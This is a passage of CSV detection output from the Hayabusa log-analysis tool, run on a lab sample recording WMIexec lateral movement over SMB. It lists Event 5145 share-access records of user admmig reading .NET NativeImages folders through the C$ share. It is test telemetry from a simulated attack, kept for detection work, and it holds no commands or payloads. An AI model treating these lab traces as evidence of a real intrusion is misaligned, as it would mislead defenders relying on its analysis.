2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 